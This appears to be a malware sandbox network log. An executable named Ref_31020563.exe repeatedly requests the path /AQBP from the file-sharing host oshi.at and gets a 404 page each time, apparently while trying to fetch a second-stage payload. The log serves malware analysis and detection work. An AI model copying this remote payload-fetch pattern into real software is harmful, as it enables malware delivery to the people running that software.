                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.849714194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:27:28 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:27:29 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:27:29 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:27:29 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          2192.168.2.849715194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:27:31 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:27:32 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:27:32 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:27:32 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          3192.168.2.849716194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:27:34 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:27:35 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:27:35 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:27:35 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          4192.168.2.849717194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:27:37 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:27:38 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:27:38 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:27:38 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          5192.168.2.849718194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:27:40 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:27:41 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:27:40 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:27:41 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          6192.168.2.849721194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:27:43 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:27:44 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:27:43 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:27:44 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          7192.168.2.849722194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:27:46 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:27:47 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:27:46 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:27:47 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          8192.168.2.849723194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:27:49 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:27:49 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:27:49 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:27:49 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          9192.168.2.849724194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:27:52 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:27:52 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:27:52 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:27:52 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          10192.168.2.849725194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:27:55 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:27:55 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:27:55 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:27:55 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          11192.168.2.849726194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:27:57 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:27:58 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:27:58 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:27:58 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          12192.168.2.849727194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:28:00 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:28:01 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:28:01 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:28:01 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          13192.168.2.849728194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:28:03 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:28:04 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:28:04 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:28:04 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          14192.168.2.849729194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:28:06 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:28:07 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:28:07 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
                                          2024-12-10 15:28:07 UTC1849INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 0a 3c 68 65 61 64 3e 0a 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 65 63 75 72 65 20 66 69 6c 65 20 73 68 61 72 69 6e 67 2e 20 45 6e 63 72 79 70 74 65 64 20 73 65 72 76 65 72 2e 20 4e 6f 20 6c 6f 67 73 2e 20 54 43 50 20 61 6e 64 20 43 75 72 6c 20 75 70
                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <meta name="description" content="Secure file sharing. Encrypted server. No logs. TCP and Curl up


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          15192.168.2.849730194.15.112.2484437572C:\Users\user\Desktop\Ref_31020563.exe
                                          TimestampBytes transferredDirectionData
                                          2024-12-10 15:28:09 UTC37OUTGET /AQBP HTTP/1.1
                                          Host: oshi.at
                                          2024-12-10 15:28:10 UTC158INHTTP/1.1 404 Not Found
                                          Server: nginx
                                          Date: Tue, 10 Dec 2024 15:28:10 GMT
                                          Content-Type: text/html;charset=UTF-8
                                          Content-Length: 1849
                                          Connection: close
